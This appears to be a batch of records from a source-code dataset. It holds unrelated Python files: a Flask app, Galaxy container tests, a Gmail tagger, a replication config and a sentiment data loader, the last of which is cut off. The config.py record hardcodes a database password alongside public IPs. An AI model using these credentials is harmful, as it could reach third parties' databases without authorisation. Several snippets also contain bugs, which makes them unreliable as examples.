+{"seq_id":"510261646","text":"#app.py is the site's \"backend,\" and will route data to the appropriate pages.\n\nimport csv\nfrom flask import Flask\nfrom flask import abort\nfrom flask import render_template #flask function that combines data with HTML\napp = Flask(__name__)\n\ndef get_csv():\n\tcsv_path = './static/la-riots-deaths.csv'\n\tcsv_file = open(csv_path, 'rb')\n\tcsv_obj = csv.DictReader(csv_file)\n\tcsv_list = list(csv_obj) \n\treturn csv_list\n\n@app.route(\"/\") #decorator connects the function with the site's root URL\ndef index(): #index function returns rendered index.html template\n\ttemplate = 'index.html'\n\tobject_list = get_csv()\n\treturn render_template(template, object_list=object_list) #pass CSV data to the template (where it will be named object_list)\n\n@app.route('/<row_id>/')\ndef detail(row_id):\n\ttemplate = 'detail.html'\n\tobject_list = get_csv()\n\tfor row in object_list:\n\t\tif row['id'] == row_id:\n\t\t\treturn render_template(template, object=row)\n\tabort(404)\n\t\nif __name__ == '__main__':\n\tapp.run(debug=True, use_reloader=True) #start the flask server when app.py is run from the command line","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"548856110","text":"\"\"\"Integration tests for running tools in Docker containers.\"\"\"\n\nimport os\nimport 
unittest\n\nfrom base import integration_util\nfrom base.populators import (\n DatasetPopulator,\n)\n\nfrom galaxy.tool_util.deps.commands import which\nfrom .test_job_environments import RunsEnvironmentJobs\n\nSCRIPT_DIRECTORY = os.path.abspath(os.path.dirname(__file__))\nDOCKERIZED_JOB_CONFIG_FILE = os.path.join(SCRIPT_DIRECTORY, \"dockerized_job_conf.xml\")\nSINGULARITY_JOB_CONFIG_FILE = os.path.join(SCRIPT_DIRECTORY, \"singularity_job_conf.xml\")\nEXTENDED_TIMEOUT = 120\n\n\nclass MulledJobTestCases(object):\n def test_explicit(self):\n self.dataset_populator.run_tool(\"mulled_example_explicit\", {}, self.history_id)\n self.dataset_populator.wait_for_history(self.history_id, assert_ok=True)\n output = self.dataset_populator.get_history_dataset_content(self.history_id, timeout=EXTENDED_TIMEOUT)\n assert \"0.7.15-r1140\" in output\n\n def test_mulled_simple(self):\n self.dataset_populator.run_tool(\"mulled_example_simple\", {}, self.history_id)\n self.dataset_populator.wait_for_history(self.history_id, assert_ok=True)\n output = self.dataset_populator.get_history_dataset_content(self.history_id, timeout=EXTENDED_TIMEOUT)\n assert \"0.7.15-r1140\" in output\n\n\nclass DockerizedJobsIntegrationTestCase(integration_util.IntegrationTestCase, RunsEnvironmentJobs, MulledJobTestCases):\n\n framework_tool_and_types = True\n job_config_file = DOCKERIZED_JOB_CONFIG_FILE\n build_mulled_resolver = 'build_mulled'\n container_type = 'docker'\n default_container_home_dir = '/'\n\n @classmethod\n def handle_galaxy_config_kwds(cls, config):\n cls.jobs_directory = cls._test_driver.mkdtemp()\n config[\"jobs_directory\"] = cls.jobs_directory\n config[\"job_config_file\"] = cls.job_config_file\n # Disable tool dependency resolution.\n config[\"tool_dependency_dir\"] = \"none\"\n config[\"conda_auto_init\"] = False\n config[\"conda_auto_install\"] = False\n config[\"enable_beta_mulled_containers\"] = \"true\"\n\n @classmethod\n def setUpClass(cls):\n if not which(cls.container_type):\n raise unittest.SkipTest(\"Executable '%s' not found on PATH\" % cls.container_type)\n super(DockerizedJobsIntegrationTestCase, cls).setUpClass()\n\n def setUp(self):\n super(DockerizedJobsIntegrationTestCase, self).setUp()\n self.dataset_populator = DatasetPopulator(self.galaxy_interactor)\n self.history_id = self.dataset_populator.new_history()\n\n def test_container_job_environment(self):\n job_env = self._run_and_get_environment_properties(\"job_environment_default\")\n\n euid = os.geteuid()\n egid = os.getgid()\n\n assert job_env.user_id == str(euid), job_env.user_id\n assert job_env.group_id == str(egid), job_env.group_id\n assert job_env.pwd.startswith(self.jobs_directory)\n assert job_env.pwd.endswith(\"/working\")\n assert job_env.home.startswith(self.jobs_directory)\n assert job_env.home.endswith(\"/home\")\n\n def test_container_job_environment_legacy(self):\n job_env = self._run_and_get_environment_properties(\"job_environment_default_legacy\")\n\n euid = os.geteuid()\n egid = os.getgid()\n\n assert job_env.user_id == str(euid), job_env.user_id\n assert job_env.group_id == str(egid), job_env.group_id\n assert job_env.pwd.startswith(self.jobs_directory)\n assert job_env.pwd.endswith(\"/working\")\n # Should we change env_pass_through to just always include TMP and HOME for docker?\n # I'm not sure, if yes this would change.\n assert job_env.home == self.default_container_home_dir, job_env.home\n\n def test_build_mulled(self):\n if not which('docker'):\n raise unittest.SkipTest(\"Docker not found on PATH, required for 
building images via involucro\")\n resolver_type = self.build_mulled_resolver\n tool_id = 'mulled_example_multi_1'\n endpoint = \"tools/%s/dependencies\" % tool_id\n data = {'id': tool_id, 'resolver_type': resolver_type}\n create_response = self._post(endpoint, data=data, admin=True)\n self._assert_status_code_is(create_response, 200)\n response = create_response.json()\n assert any([True for d in response if d['dependency_type'] == self.container_type])\n\n\nclass SingularityJobsIntegrationTestCase(DockerizedJobsIntegrationTestCase):\n\n job_config_file = SINGULARITY_JOB_CONFIG_FILE\n build_mulled_resolver = 'build_mulled_singularity'\n container_type = 'singularity'\n # singularity passes $HOME by default\n default_container_home_dir = os.environ.get('HOME', '/')\n","sub_path":"test/integration/test_containerized_jobs.py","file_name":"test_containerized_jobs.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"530198575","text":"\"\"\" An automatic mail sorter using Gmail's API \"\"\"\n\nimport os\nimport sys\nimport pickle\nfrom apiclient import errors\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom config import Config\n\nclass Tagger:\n \"\"\" Main class responsible for using Gmail's api directly \"\"\"\n\n def __init__(self):\n self.scopes = 'https://www.googleapis.com/auth/gmail.modify'\n self.config = Config()\n self.service = build('gmail', 'v1', credentials=self.get_credentials())\n\n\n def get_credentials(self):\n \"\"\" Gets valid user credentials from storage. If nothing has been stored, or\n if the stored credentials are invalid, new credentials are created. \"\"\"\n creds = None\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no valid credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', self.scopes)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n return creds\n\n def get_filtered_ids(self, query, label, time=\"2\"):\n \"\"\" List all Messages of the user's mailbox matching the query.\n user_id: User's email address.\n query: String to filter the messages by.\n time: Time range to filter messages from, by default is 48 hours. 
\"\"\"\n query = \"newer_than:{0}d (from: {1} OR to: {1})\".format(time, query)\n print(query)\n response = self.service.users().messages().list(userId='me', q=query).execute()\n ids = []\n if 'messages' in response:\n response = response['messages']\n ids.extend([msg['id'] for msg in response if not self.is_labeled(msg['id'], label)])\n while 'nextPageToken' in response:\n response = self.service.users().messages().list(\n userId='me', q=query, pageToken=response['nextPageToken']).execute()['messages']\n ids.extend([msg['id'] for msg in response if not self.is_labeled(msg['id'], label)])\n return ids\n\n def is_labeled(self, msg_id, label):\n \"\"\" Check if the message is already labeled \"\"\"\n message = self.service.users().messages().get(userId='me', id=msg_id).execute()\n return label in message['labelIds']\n\n def init_queries(self, time=\"2\"):\n \"\"\" Main feauture of the program - tag emails according to the settings file.\"\"\"\n results = self.service.users().labels().list(userId='me').execute()\n labels = dict([l['name'], l['id']] for l in results.get('labels', []))\n settings = self.config.get_settings()\n\n for tag, queries in settings.items():\n msg_ids = []\n print(\"\\n\\n[+] Current tag query: \" + tag)\n for current in queries:\n print(\"[+] Searching for email query {0} ...\".format(current))\n msg_ids += self.get_filtered_ids(current, labels[tag], time)\n print(\"[!] Located a total of {0} messages: tagging as {1}\".format(len(msg_ids), tag))\n self.tag(msg_ids, {'removeLabelIds': [], 'addLabelIds': [labels[tag]]})\n\n def tag(self, msg_ids, new_tags):\n \"\"\" Tagging messages with new tags \"\"\"\n for index, msg in enumerate(msg_ids):\n try:\n self.service.users().messages().modify(userId='me', id=msg, body=new_tags).execute()\n update_progress(len(msg_ids), index + 1)\n except errors.HttpError as error:\n print('An error occurred: ' + str(error))\n\ndef update_progress(total, completed):\n \"\"\" Generating a progress bar \"\"\"\n bar_len = 50\n progress = round((completed / total) * 100, 2)\n block = int(bar_len * progress / 100)\n # Creating a progress bar per each tagging query\n sys.stdout.write(\"\\rProgress: [{0}]\".format(\"#\" * block + \"-\" * (bar_len - block)))\n if progress == 100.0:\n sys.stdout.write(\" Completed.\")\n else:\n sys.stdout.write(\" {0}%\".format(progress))\n sys.stdout.flush()\n\ndef main():\n \"\"\" Main function.\"\"\"\n tag = Tagger()\n tag.init_queries()\n\nif __name__ == '__main__':\n main()\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"178279305","text":"\"\"\"\nBalanced ACH client library.\n\"\"\"\nimport os\nimport re\n\ntry:\n import setuptools\nexcept ImportError:\n import distutils.core\n setup = distutils.core.setup\nelse:\n setup = setuptools.setup\n\nsetup(\n name='balanced-ach',\n version=(\n re\n .compile(r\".*__version__ = '(.*?)'\", re.S)\n .match(open('balanced_ach.py').read())\n .group(1)\n ),\n url='https://github.com/balanced/balanced-ach-python',\n license='BSD',\n author='Balanced',\n author_email='dev@balancedpayments.com',\n description='Balanced ACH client library',\n long_description=(\n open('README.rst').read()\n ),\n py_modules=['balanced_ach'],\n tests_require=[\n 'nose ==1.1.2',\n 'mock ==0.8',\n 'unittest2 >=0.5.1',\n ],\n install_requires=[\n 'iso8601 >=0.1.4',\n 'simplejson >=2.3.2',\n 'wac >=0.11',\n ],\n test_suite='nose.collector',\n 
classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n)\n","sub_path":"pypi_install_script/balanced-ach-0.1.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274213638","text":"\"\"\"\nA ``Checked`` subclass definition requires that keyword arguments are\nused to create an instance, and provides a nice ``__repr__``::\n\n# tag::MOVIE_DEFINITION[]\n\n >>> @checked\n ... class Movie:\n ... title: str\n ... year: int\n ... megabucks: float\n ...\n >>> movie = Movie(title='The Godfather', year=1972, megabucks=137) # <3>\n >>> movie.title\n 'The Godfather'\n >>> movie # <4>\n Movie(title='The Godfather', year=1972, megabucks=137.0)\n\n# end::MOVIE_DEFINITION[]\n\nThe type of arguments is runtime checked when an attribute is set,\nincluding during instantiation::\n\n# tag::MOVIE_TYPE_VALIDATION[]\n\n >>> movie.year = 'MCMLXXII' # <1>\n Traceback (most recent call last):\n ...\n TypeError: 'MCMLXXII' is not compatible with year:int\n >>> blockbuster = Movie(title='Avatar', year=2009, megabucks='billions') # <2>\n Traceback (most recent call last):\n ...\n TypeError: 'billions' is not compatible with megabucks:float\n\n# end::MOVIE_TYPE_VALIDATION[]\n\nAttributes not passed as arguments to the constructor are initialized with\ndefault values::\n\n# tag::MOVIE_DEFAULTS[]\n\n >>> Movie(title='Life of Brian')\n Movie(title='Life of Brian', year=0, megabucks=0.0)\n\n# end::MOVIE_DEFAULTS[]\n\nProviding extra arguments to the constructor is not allowed::\n\n >>> blockbuster = Movie(title='Avatar', year=2009, megabucks=2000,\n ... 
director='James Cameron')\n Traceback (most recent call last):\n ...\n AttributeError: 'Movie' has no attribute 'director'\n\nCreating new attributes at runtime is restricted as well::\n\n >>> movie.director = 'Francis Ford Coppola'\n Traceback (most recent call last):\n ...\n AttributeError: 'Movie' has no attribute 'director'\n\nThe `_as_dict` instance creates a `dict` from the attributes of a `Movie` object::\n\n >>> movie._asdict()\n {'title': 'The Godfather', 'year': 1972, 'megabucks': 137.0}\n\n\"\"\"\n\nfrom collections.abc import Callable # <1>\nfrom typing import Any, NoReturn, get_type_hints\n\nMISSING = object() # <2>\n\n\nclass Field:\n def __init__(self, name: str, constructor: Callable) -> None: # <3>\n self.name = name\n self.constructor = constructor\n\n def __set__(self, instance: Any, value: Any) -> None: # <4>\n if value is MISSING: # <5>\n value = self.constructor()\n else:\n try:\n value = self.constructor(value) # <6>\n except (TypeError, ValueError) as e:\n type_name = self.constructor.__name__\n msg = (\n f'{value!r} is not compatible with {self.name}:{type_name}'\n )\n raise TypeError(msg) from e\n instance.__dict__[self.name] = value # <7>\n\n\n# tag::CHECKED_DECORATOR_TOP[]\n_methods_to_inject: list[Callable] = []\n_classmethods_to_inject: list[Callable] = []\n\ndef checked(cls: type) -> type: # <2>\n for func in _methods_to_inject:\n name = func.__name__\n setattr(cls, name, func) # <5>\n\n for func in _classmethods_to_inject:\n name = func.__name__\n setattr(cls, name, classmethod(func)) # <5>\n\n for name, constructor in _fields(cls).items(): # <4>\n setattr(cls, name, Field(name, constructor)) # <5>\n\n return cls\n\n\ndef _method(func: Callable) -> Callable:\n _methods_to_inject.append(func)\n return func\n\n\ndef _classmethod(func: Callable) -> Callable:\n _classmethods_to_inject.append(func)\n return func\n\n# tag::CHECKED_METHODS_TOP[]\n@_classmethod\ndef _fields(cls: type) -> dict[str, type]: # <1>\n return get_type_hints(cls)\n\n@_method\ndef __init__(self: Any, **kwargs: Any) -> None:\n for name in self._fields(): # <6>\n value = kwargs.pop(name, MISSING) # <7>\n setattr(self, name, value) # <8>\n if kwargs: # <9>\n self.__flag_unknown_attrs(*kwargs) # <10>\n\n@_method\ndef __setattr__(self: Any, name: str, value: Any) -> None: # <11>\n if name in self._fields(): # <12>\n cls = self.__class__\n descriptor = getattr(cls, name)\n descriptor.__set__(self, value) # <13>\n else: # <14>\n self.__flag_unknown_attrs(name)\n# end::CHECKED_METHODS_TOP[]\n\n# tag::CHECKED_METHODS_BOTTOM[]\n@_method\ndef __flag_unknown_attrs(self: Any, *names: str) -> NoReturn: # <1>\n plural = 's' if len(names) > 1 else ''\n extra = ', '.join(f'{name!r}' for name in names)\n cls_name = repr(self.__class__.__name__)\n raise AttributeError(f'{cls_name} has no attribute{plural} {extra}')\n\n\n@_method\ndef _asdict(self: Any) -> dict[str, Any]: # <2>\n return {\n name: getattr(self, name)\n for name, attr in self.__class__.__dict__.items()\n if isinstance(attr, Field)\n }\n\n\n@_method\ndef __repr__(self: Any) -> str: # <3>\n kwargs = ', '.join(\n f'{key}={value!r}' for key, value in self._asdict().items()\n )\n return f'{self.__class__.__name__}({kwargs})'\n# end::CHECKED_METHODS_BOTTOM[]\n","sub_path":"25-class-metaprog/checkeddeco/checkeddeco.py","file_name":"checkeddeco.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"170928074","text":"import socket, asyncio\nfrom sqlalchemy 
import create_engine\n\nclass DBConstants:\n Successful_update = 'UPDATE 1'\n Successful_delete = 'DELETE 1'\n DB_products = ['postgresql://postgres:ds5673@35.193.117.225:5432/product_database',\n 'postgresql://postgres:ds5673@34.69.156.181:5432/product_database',\n 'postgresql://postgres:ds5673@34.69.171.76:5432/product_database']\n DB_customers = ['postgresql://postgres:ds5673@35.232.192.83:5432/customer_database',\n 'postgresql://postgres:ds5673@34.123.110.112:5432/customer_database',\n 'postgresql://postgres:ds5673@35.188.148.198:5432/customer_database']\n\n\nclass Financial_transactions:\n host_and_port_wsdl = 'http://10.128.0.3:8002/?wsdl'\n success = 'Success'\n failure = 'Failure'\n\nclass UDP_constants:\n UDP_IP = \"0.0.0.0\"\n\n\nglobal_sequence_number = 0\nlocal_sequence_number = -1\ncurrent_host_number = 0\nUDP_PORT = 5005\nsequence_messsages = {}\nrequest_messages = {}\nraft_buyer = None\n\nclass ABP_servers:\n hosts = [('10.180.0.5', 5005), ('10.180.0.13', 5006), ('10.180.0.12', 5007)]\n raft_servers = [('10.180.0.5', 5010), ('10.180.0.13', 5010), ('10.180.0.12', 5010)]\n total_hosts = len(hosts)\n\nclass Request_Constants:\n context = 'origin_server'\n retransmit_context = 'origin_retransmit'\n\n\nsock = None\n\ndef init_sock():\n global sock\n sock = socket.socket(socket.AF_INET,\n socket.SOCK_DGRAM)\n sock.bind((UDP_constants.UDP_IP, UDP_PORT))\n sock.settimeout(2)\n\n\ndef init_current_server_number(num):\n global current_host_number\n current_host_number = num\n\n\ndef get_current_server_number():\n return current_host_number\n\n\ndef init_udp_port(port):\n global UDP_PORT\n UDP_PORT = port\n\n\ndef get_current_server_udp_port():\n return UDP_PORT\n\n\ndef get_sequence_number(sequence_type):\n if sequence_type == 'global':\n return global_sequence_number\n else:\n return local_sequence_number\n\n\ndef incr_sequence_number(sequence_type):\n if sequence_type == 'global':\n global global_sequence_number\n global_sequence_number += 1\n else:\n global local_sequence_number\n local_sequence_number += 1\n\ndef set_global_sequence_number(num):\n global global_sequence_number\n global_sequence_number = max(global_sequence_number, num)\n\n\ndef insert_into_sequence_messages(key, value):\n global sequence_messsages\n sequence_messsages[key] = value\n print(\"sequence messages :- \", sequence_messsages)\n print('--------------------------------------------------')\n\n\ndef insert_into_request_messages(key, value):\n global request_messages\n request_messages[key] = value\n print(\"request messages :- \", request_messages)\n print('--------------------------------------------------')\n\n\ndef get_messages_dict(message_type):\n if message_type == 'global':\n return sequence_messsages\n else:\n return request_messages\n\n\ndef clear_dict(message_type):\n if message_type == 'global':\n global sequence_messsages\n sequence_messsages = {}\n else:\n global request_messages\n request_messages = {}\n\n\nfrom pysyncobj import SyncObj, replicated_sync\nsql_alchemy_obj = None\n\ndef init_sql_alchemy_obj():\n global sql_alchemy_obj\n sql_alchemy_obj = create_engine(DBConstants.DB_products[get_current_server_number()])\n\n\nclass RaftBuyer(SyncObj):\n def __init__(self):\n super(RaftBuyer, self).__init__(\n ABP_servers.raft_servers[get_current_server_number()][0] + ':' + str(ABP_servers.raft_servers[get_current_server_number()][1]),\n [host[0] + ':' + str(host[1]) for host in ABP_servers.raft_servers if host !=\n ABP_servers.raft_servers[get_current_server_number()]])\n print(\"Raft buyer 
constructor :- \", ABP_servers.raft_servers[get_current_server_number()][0] + ':' + str(ABP_servers.raft_servers[get_current_server_number()][1]))\n print(sql_alchemy_obj)\n\n def update_func(self, item_id, diff):\n from models.items import Items\n # asyncio.run_coroutine_threadsafe(Items.update.values(quantity=diff).where(Items.id == item_id).gino.status(),\n # self.loop)\n with sql_alchemy_obj.connect() as con:\n con.execute('Update {} set quantity={} where id={}'.format(Items.__tablename__, diff, item_id))\n\n\n @replicated_sync\n def update_item(self, item_id, diff):\n print(\"Raft, updating item :- \", item_id)\n # asyncio.create_task(Items.update.values(quantity=diff).where(Items.id == item_id).gino.status())\n self.update_func(item_id, diff)\n # loop.create_task(Items.update.values(quantity=diff).where(Items.id == item_id).gino.status())\n # await Items.update.values(quantity=diff).where(Items.id == item_id).gino.status()\n\n\ndef init_raft_buyer():\n global raft_buyer\n raft_buyer = RaftBuyer()\n\n\n\ndef get_raft_buyer():\n return raft_buyer\n","sub_path":"Buyer_server/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"115208210","text":"def main():\n n = int(input('n: '))\n aux = int(n ** 0.5)\n quadrado = 0\n\n for i in range(0, aux, n):\n if i <= n:\n quadrado = aux ** 2\n print(f'o maior quadrado é: {quadrado}')\n\n\nmain()\n","sub_path":"Lista 03 Repetição for/for_03_14.py","file_name":"for_03_14.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"417621535","text":"import pulumi\nimport pulumi.runtime\n\nfrom ... 
import tables\n\nclass APIResourceList(pulumi.CustomResource):\n \"\"\"\n APIResourceList is a list of APIResource, it is used to expose the name of the resources\n supported in a specific group and version, and if the resource is namespaced.\n \"\"\"\n def __init__(self, __name__, __opts__=None, group_version=None, resources=None):\n if not __name__:\n raise TypeError('Missing resource name argument (for URN creation)')\n if not isinstance(__name__, str):\n raise TypeError('Expected resource name to be a string')\n if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n\n __props__ = dict()\n\n __props__['apiVersion'] = 'v1'\n __props__['kind'] = 'APIResourceList'\n if not groupVersion:\n raise TypeError('Missing required property groupVersion')\n __props__['groupVersion'] = group_version\n if not resources:\n raise TypeError('Missing required property resources')\n __props__['resources'] = resources\n\n super(APIResourceList, self).__init__(\n \"kubernetes:core/v1:APIResourceList\",\n __name__,\n __props__,\n __opts__)\n\n def translate_output_property(self, prop: str) -> str:\n return tables._CASING_FORWARD_TABLE.get(prop) or prop\n\n def translate_input_property(self, prop: str) -> str:\n return tables._CASING_BACKWARD_TABLE.get(prop) or prop\n","sub_path":"sdk/python/pulumi_kubernetes/meta/v1/APIResourceList.py","file_name":"APIResourceList.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"636824702","text":"\n\nfrom xai.brain.wordbase.nouns._arbiter import _ARBITER\n\n#calss header\nclass _ARBITERS(_ARBITER, ):\n\tdef __init__(self,): \n\t\t_ARBITER.__init__(self)\n\t\tself.name = \"ARBITERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"arbiter\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_arbiters.py","file_name":"_arbiters.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365628190","text":"import random\n\ndef failed_quicksort(arr):\n if len(arr) <= 1:\n return arr\n\n # value at array position 0\n pivot_value = arr[0]\n\n smaller_array = []\n larger_array = []\n\n for i in arr[1:]:\n # test = range(1, len(arr))\n # print(test)\n if i <= pivot_value:\n smaller_array.append(i)\n else:\n # print(\"no larger?\")\n larger_array.append(i)\n\n # print(\"smaller\", smaller_array)\n # print(\"larger\", larger_array) \n\n sorted_smaller = quicksort(smaller_array)\n sorted_larger = quicksort(larger_array)\n\n # print(pivot_value)\n # print(\"sorted smaller\", sorted_smaller)\n # print(\"sorted larger\", sorted_larger)\n # sorted_smaller.append(pivot_value)\n\n return sorted_smaller + [pivot_value] + sorted_larger\n\ndef partition(data):\n left = []\n pivot = data[0]\n right = []\n\n for v in data[1:]:\n if v <= pivot:\n left.append(v)\n else:\n right.append(v)\n\n return left, pivot, right\n\ndef quicksort(data):\n if data == []:\n return data\n\n left, pivot, right = partition(data)\n\n return quicksort(left) + [pivot] + quicksort(right)\n\n\ntest_arr = random.sample(range(30), 20)\nprint(test_arr)\nprint(quicksort(test_arr))\nprint(failed_quicksort(test_arr))","sub_path":"src/quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
+{"seq_id":"394927040","text":"import os,sys\nimport numpy as np\nimport torch\nimport utils\nfrom torchvision import datasets,transforms\nfrom sklearn.utils import shuffle\nimport pickle\nimport os\nimport pymongo\nimport collections\n\nimport numpy as np\nfrom collections import Counter\nimport random\n\n\ndef get(seed=0,pc_valid=0.10,args=0,max_doc_len=240, tasknum=10):\n data={}\n taskcla=[]\n size=[1,240,300]\n\n f = open('/home/zixuan/KAN/image/dat/sentiment/squence','r')\n domain_list = f.readlines()[0].replace('\\n','').split()\n\n if not os.path.isdir('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment/'):\n os.makedirs('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment')\n\n word2id, weights_matrix, voc_size= compute_embedding(domain_list)\n\n for n in range(10):\n data[n]={}\n data[n]['name']='sentiment'\n data[n]['ncla']=2\n\n train_x, _, train_y = load_inputs_document_mongo2D(\n [domain_list[n]], 'train', word2id, max_doc_len)\n val_x, _, val_y = load_inputs_document_mongo2D(\n [domain_list[n]], 'dev', word2id, max_doc_len)\n test_x, _, test_y = load_inputs_document_mongo2D(\n [domain_list[n]], 'test', word2id,max_doc_len)\n\n data[n]['train']={'x': train_x,'y': train_y}\n data[n]['valid']={'x': val_x,'y': val_y}\n data[n]['test']={'x': test_x,'y': test_y}\n\n # print(train_y.shape)\n # print(val_y.shape)\n # print(test_y.shape)\n # print(domain_list[n])\n # print(train_y)\n\n\n # \"Unify\" and save\n for t in data.keys():\n for s in ['train','valid','test']:\n\n data[t][s]['x']=torch.LongTensor(np.array(data[t][s]['x'],dtype=int))\n data[t][s]['y']=torch.argmax(torch.LongTensor(np.array(data[t][s]['y'],dtype=int)),dim=1).view(-1)\n\n torch.save(data[t][s]['x'], os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(t)+s+'x.bin'))\n torch.save(data[t][s]['y'], os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(t)+s+'y.bin'))\n\n # print(domain_list[t])\n # print(s)\n # print(data[t][s]['y'].size())\n\n\n np.save(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'weights_matrix'), weights_matrix)\n np.save(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'voc_size'),voc_size)\n\n\n # Load binary files\n data={}\n ids=list(shuffle(np.arange(10),random_state=seed))\n print('Task order =',ids)\n for i in range(10):\n data[i] = dict.fromkeys(['name','ncla','train','test','valid'])\n for s in ['train','valid','test']:\n data[i][s]={'x':[],'y':[]}\n data[i][s]['x']=torch.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(ids[i])+s+'x.bin'))\n data[i][s]['y']=torch.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(ids[i])+s+'y.bin'))\n data[i]['ncla']=len(np.unique(data[i]['train']['y'].numpy()))\n data[i]['name']='sentiment-'+str(domain_list[ids[i]])\n\n\n\n # Others\n n=0\n for t in data.keys():\n taskcla.append((t,data[t]['ncla']))\n n+=data[t]['ncla']\n data['ncla']=n\n\n\n weights_matrix = np.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'weights_matrix.npy'))\n voc_size= np.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'voc_size.npy'))\n\n\n\n return data,taskcla,size,voc_size,weights_matrix\n\n\n\n# facility ===========================\n\n\nclass Vocabulary(object):\n \"\"\"Vocabulary\n \"\"\"\n\n EOS = 'UNK'\n\n def __init__(self, add_eos=True):\n self._add_eos 
= add_eos\n self._word_dict = None\n self._word_list = None\n self._voc_size = None\n\n def load(self, iter_voc_item, word_column='word', index_column='index'):\n \"\"\"Load an existing vocabulary.\n\n Args:\n iter_voc_item: Iterable object. This can be a list, a generator or a database cursor.\n word_column (str): Column name that contains the word.\n index_column (str): Column name that contains the word index.\n\n \"\"\"\n # load word_dict\n word_dict = dict()\n for doc in iter_voc_item:\n word = doc[word_column]\n index = doc[index_column]\n word_dict[word] = index\n\n # generate word_list\n voc_size = len(word_dict)\n word_list = [None for _ in range(voc_size)]\n for word, index in word_dict.items():\n word_list[index] = word\n\n self._word_dict = word_dict\n self._word_list = word_list\n self._voc_size = voc_size\n return self\n\n def dump(self, word_column='word', index_column='index'):\n \"\"\"Dump the current vocabulary to a dict generator.\n\n Args:\n word_column (str): Column name for word.\n index_column (str): Column name for index.\n\n Returns:\n A generator of dict object.\n\n \"\"\"\n for word, index in self._word_dict.items():\n yield {\n word_column: word,\n index_column: index\n }\n\n def generate(self, iter_words, words_column='words', min_count=1, verbose_fn=None):\n \"\"\"Generate a vocabulary from sentences.\n\n Args:\n iter_words: Iterable object. This can be a list, a generator or a database cursor.\n words_column (str): Column name that contains \"words\" data.\n min_count (int): Minimum count of the word in the vocabulary.\n verbose_fn ((int) -> None): Verbose function.\n This is useful when iter_words contains much more documents.\n\n \"\"\"\n # statistic info\n counter = collections.defaultdict(int)\n for i, doc in enumerate(iter_words, 1):\n words = doc[words_column]\n for word in words:\n counter[word] += 1\n if verbose_fn:\n verbose_fn(i)\n if '' in counter:\n del counter['']\n\n # generate word_dict (word -> index)\n word_dict = {self.EOS: 0}\n for word, count in counter.items():\n if count < min_count:\n continue\n index = len(word_dict)\n word_dict[word] = index\n\n # generate word_list\n voc_size = len(word_dict)\n word_list = [None for _ in range(voc_size)]\n for word, index in word_dict.items():\n word_list[index] = word\n\n self._word_dict = word_dict\n self._word_list = word_list\n self._voc_size = voc_size\n return self\n\n @property\n def voc_size(self):\n return self._voc_size\n\n @property\n def word_dict(self):\n return self._word_dict\n\n @property\n def word_list(self):\n return self._word_list\n\n def indexes_to_words(self, indexes):\n id2word = {}\n for index in range(indexes):\n id2word[index] = self._word_list[index]\n return id2word\n\n\nclass WordEmbedding(object):\n\n def __init__(self):\n self._word_dict = None\n self._word_list = None\n self._emb_mat = None\n\n def load(self, iter_emb_item, word_column='word', index_column='index', vector_column='vector'):\n # load word_dict and emb_dict\n word_dict = dict()\n emb_dict = dict()\n for doc in iter_emb_item:\n word = doc[word_column]\n index = doc[index_column]\n vector = doc[vector_column]\n word_dict[word] = index\n emb_dict[index] = vector\n voc_size = len(word_dict)\n\n # generate word_list\n word_list = [None for _ in range(voc_size)]\n for word, index in 